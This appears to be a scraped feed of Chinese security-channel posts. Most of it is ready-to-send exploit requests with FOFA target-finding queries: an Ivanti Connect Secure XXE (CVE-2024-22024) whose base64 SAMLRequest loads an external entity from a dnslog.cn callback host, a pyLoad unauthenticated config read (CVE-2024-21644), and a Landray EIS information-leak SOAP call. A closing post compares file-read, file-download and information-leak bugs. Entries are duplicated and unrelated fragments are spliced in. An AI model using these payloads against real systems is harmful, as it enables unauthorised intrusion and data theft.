Ivanti Pulse Connect Secure VPN 存在XXE 漏洞(CVE-2024-22024)
body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 172Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4
body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: ipUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 172Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vMHVyeDNsLmRuc2xvZy5jbi94Ij4gJXdhdGNoVG93cjtdPjxyPjwvcj4
Pyload未授权访问漏洞(CVE-2024-21644)
app:"pyLoad"
GET /render/info.html HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/15.6Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate
(获取Flask配置poc)
app:"pyLoad"
GET /render/info.html HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15 Ddg/15.6Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip, deflate
(获取Flask配置poc)
👍3
蓝凌 EIS智慧协同平台WS_getAllInfos存在信息泄露漏洞
Fofa: app="Landray-EIS智慧协同平台
POST /WS/Basic/Basic.asmx HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FIUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/WS_getAllInfosContent-Type: text/xml;charset=UTF-8Host: Content-Length: 214<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><tem:WS_getAllInfos/></soapenv:Body></soapenv:Envelope>
Fofa: app="Landray-EIS智慧协同平台
POST /WS/Basic/Basic.asmx HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ASP.NET_SessionId=u1n0cky5q5giplqhpajjrf55; FIOA_IMG_FOLDER=FIUpgrade-Insecure-Requests: 1SOAPAction: http://tempuri.org/WS_getAllInfosContent-Type: text/xml;charset=UTF-8Host: Content-Length: 214<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body><tem:WS_getAllInfos/></soapenv:Body></soapenv:Envelope>
Search - Microsoft Bing
A gateway to stone wonders
From 18th-century visitors to fire-carved trails,
❤1
关于 文件读取 任意文件读取 敏感信息泄露以及任意文件下载漏洞的共同点和区别
文件读取和任意文件读取,顾名思义,一个是能读某个本来不应该读取的文件,一个是服务器上啥文件都能读取。原理是代码里file_get_contents(),fopen(),reafile()这种文件读取函数调用前没有验证,任意文件读取是在文件读取漏洞的基础上回溯符滥用../,可以简单的理解为文件读取是对于权限认证的bypass,是未授权访问的一种,任意文件读取是文件读取加目录遍历
文件读取和文件下载漏洞的区别,这个是浏览器响应头设置的问题。举个例子,如果他php代码写的是
敏感信息泄露,有的文章说是任意文件读取的子集,有道理但是我个人觉得这个说法不一定恰当。因为有些敏感信息泄露,edusrc长期刷分的那种,某某接口泄露明文手机号身份证号的,api在后端就用类似于Apache Solr里的DataImportHandler程序处理了,再通过接口的输入验证缺陷发送给你,这个过程其实相当于他帮助你合法完成了解密数据的过程——总结来说就是,任意文件读取漏洞理论上确实能做到敏感信息泄露漏洞有的所有危害,但是任意文件读取很多时候你读的都是一堆子加密后的数据。确实,你可以说我继续读解密代码接口配置代码把密文解密出来,但是肯定没有敏感信息泄露直接泄露来得快,这也是我个人认为这俩算是两种不同漏洞的原因
文件读取和任意文件读取,顾名思义,一个是能读某个本来不应该读取的文件,一个是服务器上啥文件都能读取。原理是代码里file_get_contents(),fopen(),reafile()这种文件读取函数调用前没有验证,任意文件读取是在文件读取漏洞的基础上回溯符滥用../,可以简单的理解为文件读取是对于权限认证的bypass,是未授权访问的一种,任意文件读取是文件读取加目录遍历
文件读取和文件下载漏洞的区别,这个是浏览器响应头设置的问题。举个例子,如果他php代码写的是
header('Content-Type: application/pdf');
这就是文件读取漏洞,如果写的是header('Content-Type: application/octet-stream');
那就是文件下载漏洞,文件内容发送到服务器输出缓冲区以stream流进行传输。从安全角度来说我感觉区别倒是不大,无非是在线观看和本地保存的区别敏感信息泄露,有的文章说是任意文件读取的子集,有道理但是我个人觉得这个说法不一定恰当。因为有些敏感信息泄露,edusrc长期刷分的那种,某某接口泄露明文手机号身份证号的,api在后端就用类似于Apache Solr里的DataImportHandler程序处理了,再通过接口的输入验证缺陷发送给你,这个过程其实相当于他帮助你合法完成了解密数据的过程——总结来说就是,任意文件读取漏洞理论上确实能做到敏感信息泄露漏洞有的所有危害,但是任意文件读取很多时候你读的都是一堆子加密后的数据。确实,你可以说我继续读解密代码接口配置代码把密文解密出来,但是肯定没有敏感信息泄露直接泄露来得快,这也是我个人认为这俩算是两种不同漏洞的原因
❤3👍2
